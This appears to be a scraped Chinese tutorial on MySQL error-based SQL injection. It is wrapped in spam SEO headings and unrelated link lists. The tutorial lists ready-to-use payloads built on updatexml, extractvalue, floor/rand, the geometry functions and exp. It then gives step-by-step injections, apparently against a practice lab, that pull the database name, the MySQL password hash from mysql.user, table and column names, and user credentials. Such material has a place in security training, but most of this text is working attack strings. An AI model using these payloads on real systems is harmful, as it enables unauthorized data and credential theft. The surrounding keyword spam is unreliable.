当前位置: 首页 > news >正文

宝山湖网站建设网站改版公司哪家好

宝山湖网站建设,网站改版公司哪家好,网域高科学校网站管理系统,为什么不能用来名字做网站名报错注入报错注入定义代码展示常用的报错语句1.获取数据库名称2.获取mysql账号密码3.获取表名4.获取字段名5.获取账号密码报错注入定义 报错注入:利用sql语句的不规范,获取相关sql提示信息 代码展示 常用的报错语句 select first_name, last_name FROM…

报错注入

    • 报错注入定义
    • 代码展示
    • 常用的报错语句
      • 1.获取数据库名称
      • 2.获取mysql账号密码
      • 3.获取表名
      • 4.获取字段名
      • 5.获取账号密码

报错注入定义

报错注入:利用sql语句的不规范,获取相关sql提示信息

代码展示

在这里插入图片描述

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1' and info() -- 

在这里插入图片描述

2.获取mysql账号密码

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) -- 

因为一条只能显示32字符,所以两段拼接则为mysql密码
在这里插入图片描述
在这里插入图片描述

3.获取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

4.获取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述
借助burpsuite

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5.获取账号密码

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

http://www.hrbkazy.com/news/30006.html

相关文章:

  • 番禺区大石做网站杭州网站推广优化
  • 做AE视频素材在哪些网站上可以找公司网址
  • 网站建设中 html5武汉seo排名公司
  • 官方网站开发哪家好怎么样做免费的百度seo
  • 网站源码下载插件seo外链技巧
  • 泰安企业做网站搜狗seo快速排名公司
  • 找大学生做网站靠谱吗长春网站建设方案托管
  • 做任务佣金网站源码营销推广外包
  • 临沂建网站哪家好设计网站的软件
  • 音乐图书馆网站建设餐饮品牌全案策划
  • 模板性网站建设seo推广教学
  • 做网站排名软件谷歌浏览器app
  • 佛山微网站建设 天博360推广平台登录入口
  • 利用微博做网站排名网络营销的六个特点
  • 大庆做网站的网络销售平台上市公司有哪些
  • 免费浏览的网站入口百度网站排名规则
  • 网站建设的技术支持湖南平台网站建设制作
  • 网站制作优质公司宁波网站推广哪家公司好
  • 长沙快速建站模板品牌全网推广
  • 桂林网站制作网站2023引流软件
  • 企业网站的基本功能市场调研的步骤
  • 石家庄做外贸网站建设中国十大企业管理培训机构
  • 怎么样做网站的目录结构合肥网站优化技术
  • 安徽网站建设的基本步骤搜索引擎优化服务
  • 台州找人做网站下载百度app下载
  • 怎么创立自己的网站河南网站建设报价
  • 一级a做爰片2017免费网站搜索引擎的营销方法有哪些
  • 网站备案地上海seo外包
  • 中央决定唐山秦皇岛合并wp博客seo插件
  • 网站大全免费电影企业qq官网